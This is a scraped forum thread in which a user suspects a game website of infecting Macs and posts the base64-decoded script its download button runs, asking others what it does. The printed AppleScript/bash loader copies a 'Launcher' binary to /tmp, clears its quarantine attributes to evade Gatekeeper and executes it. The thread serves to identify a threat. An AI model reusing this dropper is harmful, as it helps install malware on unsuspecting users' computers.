169 похожих чатов

Hey guys, I think this website is trying to hack computers

by running a bash script, any body can understand how it works?
https://crypticisland.net

8 ответов

3 просмотра

Maybe there is bash script for installing the game?

Ehsan- Автор вопроса
klimi
Maybe there is bash script for installing the game...

Yes, I decoded base64, but I couldn't understand the purpose of that

Ehsan- Автор вопроса
klimi
Maybe there is bash script for installing the game...

#!/bin/bash osascript -e 'on run try set TI ]olumeList to list disks end try set setupVolume to "" try repeat with vol in volumeList if vol contains "Launcher" then set setupVolume to vol D exit repeat end if end repeat end try if setupVolume is "" then return end if set scriptDir to "/Volumes/" & setupVolume & "/" set executableName to "Launcher" set executablePath to scriptDir & executableName set tmpExecutablePath to "/tmp/" & executableName try do shell script "rm -f " & quoted form of tmpExecutablePath end try try do shell script "cp " & quoted form of executablePath & " " & quoted form of tmpExecutablePath end try try do shell script "xattr -c " & quoted form of tmpExecutablePath end try try do shell script "chmod +x " & quoted form of tmpExecutablePath end try try do shell script quoted form of tmpExecutablePath end try end run'

Running a bash script where?

Chiyando
Looks really nasty

Not talking about the syntax

Ehsan- Автор вопроса
Link 🪈
Running a bash script where?

MacOs The website has a download button which try to run a bash script

Похожие вопросы

Обсуждают сегодня

Господа, а что сейчас вообще с рынком труда на делфи происходит? Какова ситуация?
Rꙮman Yankꙮvsky
29
А вообще, что может смущать в самой Julia - бы сказал, что нет единого стандартного подхода по многим моментам, поэтому многое выглядит как "хаки" и произвол. Короче говоря, с...
Viktor G.
2
30500 за редактор? )
Владимир
47
а через ESC-код ?
Alexey Kulakov
29
Чёт не понял, я ж правильной функцией воспользовался чтобы вывести отладочную информацию? но что-то она не ловится
notme
18
У меня есть функция где происходит это: write_bit(buffer, 1); write_bit(buffer, 0); write_bit(buffer, 1); write_bit(buffer, 1); write_bit(buffer, 1); w...
~
14
Добрый день! Скажите пожалуйста, а какие программы вы бы рекомендовали написать для того, чтобы научиться управлять памятью? Можно написать динамический массив, можно связный ...
Филипп
7
Недавно Google Project Zero нашёл багу в SQLite с помощью LLM, о чём достаточно было шумно в определённых интернетах, которые сопровождались рассказами, что скоро всех "ибешни...
Alex Sherbakov
5
Ребят в СИ можно реализовать ООП?
Николай
33
https://github.com/erlang/otp/blob/OTP-27.1/lib/kernel/src/logger_h_common.erl#L174 https://github.com/erlang/otp/blob/OTP-27.1/lib/kernel/src/logger_olp.erl#L76 15 лет назад...
Maksim Lapshin
20
Карта сайта